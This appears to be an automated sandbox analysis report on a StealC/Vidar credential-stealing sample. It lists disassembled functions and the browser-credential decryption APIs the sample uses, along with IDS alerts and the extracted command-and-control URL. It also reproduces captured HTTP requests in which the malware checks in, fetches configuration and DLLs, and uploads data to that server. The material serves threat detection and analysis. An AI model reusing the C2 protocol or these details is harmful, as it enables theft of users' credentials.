Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: 35b858788b0ff6a3b409b812e3c803ab8928f41685c3b94dc2a3002db08fce80
Instruction ID: d1d66d402d502d92e25d841c310aaa5e75c81caa95697cebae7ca556a067cb1b
Opcode Fuzzy Hash: 35b858788b0ff6a3b409b812e3c803ab8928f41685c3b94dc2a3002db08fce80
Instruction Fuzzy Hash: AC414271D10108EBDB06EFE4C885EEEB778AF54305F008518E9167B260DB75AA09DFA2

Function 003594D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 003594EB

Part of subcall function 00358D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0035951E,00000000), ref: 00358D5B
Part of subcall function 00358D50: RtlAllocateHeap.NTDLL(00000000), ref: 00358D62
Part of subcall function 00358D50: wsprintfW.USER32 ref: 00358D78

OpenProcess.KERNEL32(00001001,00000000,?), ref: 003595AB
TerminateProcess.KERNEL32(00000000,00000000), ref: 003595C9
CloseHandle.KERNEL32(00000000), ref: 003595D6

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 3729781310-0
Opcode ID: e8dee00528aa8e13162f913672dfec3815efd629b868f9e9e719a760c3231a62
Instruction ID: c21684f13ee8724c0a9e78be359c1489225e9d93945738952656a5f28fa45612
Opcode Fuzzy Hash: e8dee00528aa8e13162f913672dfec3815efd629b868f9e9e719a760c3231a62
Instruction Fuzzy Hash: 6C313C71E00308DFEB15DBE0CC49FEDB7B8EB54301F20455AE906AA194EB74AA89DF51

Function 00357980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00360E00,00000000,?), ref: 003579B0
RtlAllocateHeap.NTDLL(00000000), ref: 003579B7
GetLocalTime.KERNEL32(?,?,?,?,?,00360E00,00000000,?), ref: 003579C4
wsprintfA.USER32 ref: 003579F3

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: beebc83397a4202524c6a97196cf17de95ba8b6c79afd5c981577f8ee1e02d66
Instruction ID: 3df4b24ac7bbc0598e9bcf968ddbcc3ecd79ec0b5dc047dc183055b798ac7785
Opcode Fuzzy Hash: beebc83397a4202524c6a97196cf17de95ba8b6c79afd5c981577f8ee1e02d66
Instruction Fuzzy Hash: A11118B2904118AADB149FCADD45BBEB7F8EB48B11F10411AFA05A2290E2395944DBB1

Function 0035C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0035C74E

Part of subcall function 0035BF9F: __amsg_exit.LIBCMT ref: 0035BFAF

__getptd.LIBCMT ref: 0035C765
__amsg_exit.LIBCMT ref: 0035C773
__updatetlocinfoEx_nolock.LIBCMT ref: 0035C797

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
String ID:
API String ID: 300741435-0
Opcode ID: e28b9827b308a1030df9ffd964f1012d673ab049ff04d6e3b2c9c83f327b4377
Instruction ID: fe44353c6f4c49be72c6f3e362feee5a37b723ee2b247108d91eaccfb143dfa3
Opcode Fuzzy Hash: e28b9827b308a1030df9ffd964f1012d673ab049ff04d6e3b2c9c83f327b4377
Instruction Fuzzy Hash: 4BF09032910B109FD723BBB89C06F49B3A06F0472BF255149FC14AE5F2CB6459889E96

Source: http://185.215.113.37/	URL Reputation: Label: malware
Source: http://185.215.113.37	URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php	URL Reputation: Label: malware

Source: 0.2.file.exe.340000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: 0.2.file.exe.340000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00349B60 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00349B60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0034C820 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0034C820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00347240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00347240
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00349AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00349AC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00358EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00358EA0

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49737 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49737 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.37:80 -> 192.168.2.4:49737
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49737 -> 185.215.113.37:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.37:80 -> 192.168.2.4:49737
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49737 -> 185.215.113.37:80

Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: Malware configuration extractor	URLs: http://185.215.113.37/e2b1563c6670f193.php

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFBHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 46 34 39 34 36 34 39 36 46 42 34 31 30 39 33 35 33 31 37 31 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 2d 2d 0d 0a Data Ascii: ------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="hwid"1AF4946496FB4109353171------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="build"doma------IEHIIIJDAAAAAAKECBFB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBKEHJEGCFBFHJJKJEHDHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 4b 45 48 4a 45 47 43 46 42 46 48 4a 4a 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 48 4a 45 47 43 46 42 46 48 4a 4a 4b 4a 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 4b 45 48 4a 45 47 43 46 42 46 48 4a 4a 4b 4a 45 48 44 2d 2d 0d 0a Data Ascii: ------FBKEHJEGCFBFHJJKJEHDContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------FBKEHJEGCFBFHJJKJEHDContent-Disposition: form-data; name="message"browsers------FBKEHJEGCFBFHJJKJEHD--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----ECAEGHIJEHJDHIDHIDAEHost: 185.215.113.37Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 43 41 45 47 48 49 4a 45 48 4a 44 48 49 44 48 49 44 41 45 2d 2d 0d 0a Data Ascii: ------ECAEGHIJEHJDHIDHIDAEContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------ECAEGHIJEHJDHIDHIDAEContent-Disposition: form-data; name="message"plugins------ECAEGHIJEHJDHIDHIDAE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHCBAEHJJJKKFIDGHJEHost: 185.215.113.37Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 2d 2d 0d 0a Data Ascii: ------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------JDHCBAEHJJJKKFIDGHJEContent-Disposition: form-data; name="message"fplugins------JDHCBAEHJJJKKFIDGHJE--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DGHIECGCBKFHIEBGHDBKHost: 185.215.113.37Content-Length: 6899Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCFBGIDAEHCFIDGCBGIIHost: 185.215.113.37Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCAAEHJDBKJJKFHJEBKHost: 185.215.113.37Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAAEGIJKEGHIDGCBAEBHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 41 45 47 49 4a 4b 45 47 48 49 44 47 43 42 41 45 42 2d 2d 0d 0a Data Ascii: ------HCAAEGIJKEGHIDGCBAEBContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------HCAAEGIJKEGHIDGCBAEBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HCAAEGIJKEGHIDGCBAEBContent-Disposition: form-data; name="file"------HCAAEGIJKEGHIDGCBAEB--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECBHost: 185.215.113.37Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 39 30 33 34 66 62 31 33 31 38 62 66 38 61 64 65 32 65 63 65 63 31 61 36 65 64 30 32 36 38 31 35 37 30 63 38 61 30 38 37 66 61 64 35 64 64 32 63 61 36 63 35 62 33 38 65 35 66 34 30 62 63 33 64 64 31 62 38 31 35 32 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 48 49 44 48 4a 44 42 46 49 49 45 43 41 4b 45 43 42 2d 2d 0d 0a Data Ascii: ------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="token"29034fb1318bf8ade2ecec1a6ed02681570c8a087fad5dd2ca6c5b38e5f40bc3dd1b8152------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GIEHIDHJDBFIIECAKECBContent-Disposition: form-data; name="file"------GIEHIDHJDBFIIECAKECB--
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/freebl3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/mozglue.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/msvcp140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/nss3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/softokn3.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1Host: 185.215.113.37Cache-Control: no-cache
